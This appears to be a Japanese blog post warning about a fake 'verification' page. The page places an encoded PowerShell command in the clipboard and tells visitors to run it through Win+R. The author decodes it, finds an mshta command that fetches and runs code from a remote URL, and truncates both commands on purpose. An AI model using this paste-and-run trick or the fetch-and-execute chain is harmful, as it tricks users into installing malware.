【小ネタ】新手のマルウェア?
今日、とあるサイトを見ていたら唐突に別タブが開いて、以下のような文言が表示されました。
Verification Steps
1. Press Windows Button "" + R
2. Press CTRL + V
3. Press Enter
要するに「ファイル名を指定して実行」を開いてクリップボードを貼り付けて実行しろ、と言っていて、つまりこのタブが開かれた時点で何やらよからぬ文字列がクリップボードに入ったと思いました。
クリップボードには以下の文字列が入っていました。(誤操作防止のため一部省略します)
powershell.exe -eC bQBz...ADEA
-eC パラメータは、MSDNを見ると次のように書いてありました。
-EncodedCommand <Base64EncodedCommand>
Base 64 エンコード文字列版のコマンドを許可します。 複雑な引用符や中かっこを必要とするコマンドを PowerShell に渡す場合にこのパラメーターを使用します。 文字列は UTF-16LE 文字エンコードを使用して書式設定する必要があります。
なので次は上記の引数をBase64デコードします。MSDNに記載のとおり UTF-16 LE としてデコードすればよいです。
デコードするとこのようなコマンドが出てきました。(誤操作防止のため以下略
mshta https://.../...
mshtaはインターネット上のプログラムを実行する、Windowsに付属しているコマンドらしいです。
上記のURLの中身までは怖すぎて覗いていませんが、下記のとおりウィルスっぽいものをバラ撒く常套手段として古くからあったっぽいので、皆さまも似たような事例に遭遇した場合はご注意ください。
